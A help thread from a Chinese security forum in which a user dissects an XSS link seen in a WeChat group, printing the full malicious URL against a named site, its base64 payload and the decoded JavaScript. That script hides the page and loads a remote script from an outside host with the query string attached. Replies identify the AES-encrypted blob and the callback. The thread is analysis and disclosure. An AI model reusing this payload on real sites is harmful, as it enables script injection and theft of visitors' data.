首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 求助问答
    3. 发新帖
未解决 [求助]一个xss攻击样本中,代码的作用求解
发表于: 2020-11-16 09:51 1761

未解决 [求助]一个xss攻击样本中,代码的作用求解

capser 活跃值
2020-11-16 09:51
1761

在微信群里看到一个连接,链接:

1
https://http://www.qufair.com/public/login/pintb/daqin33?ref=https%3A%2F%2Fwww.qufair.com%2Fconvention%2F5880.shtml520%27%7D)%7D;new%20Function(atob(%60ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7di5zcmM9Ii8vejIuZHVveGouY29tL3giK3dpbmRvdy5sb2NhdGlvbi5zZWFyY2g7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60))();if(0)%7B$(%7B//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

第一部分 创建个函数然后跳转

1
2
3
4
5
6
7
(function anonymous() {
    document.documentElement.hidden=1;
    v=document.createElement("script");
    v.src="//z2.duoxj.com/x"+window.location.search;
    document.head.appendChild(v);
    throw 0
})

但是第二部分中

1
if(0){$({//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

按我理解是一个不调用的闭合函数, 但中间有段aes加密的密文

1
U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

求教这个干嘛用的,有点逼死强迫症的感觉
(地址没隐藏,希望能联系上这个站点管理员的让补下漏洞吧)


[注意]看雪招聘,专注安全领域的专业人才平台!

收藏
免费
支持
分享
最新回复 (2)
mb_foyotena
雪    币: 477
活跃值: (1412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
b64吧
2020-11-16 12:39
0
capser
雪    币: 212
活跃值: (466)
能力值: ( LV3,RANK:38 )
在线值:
发帖
回帖
粉丝
私信
3
嗯,decode后有Salted的头,是AES加密的文本。 
 v.src="//z2.duoxj.com/x"+window.location.search; 有带链接回去
所以应该是个平台,带了类似场景值得东西回去。
自己结贴
2020-11-16 13:53
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》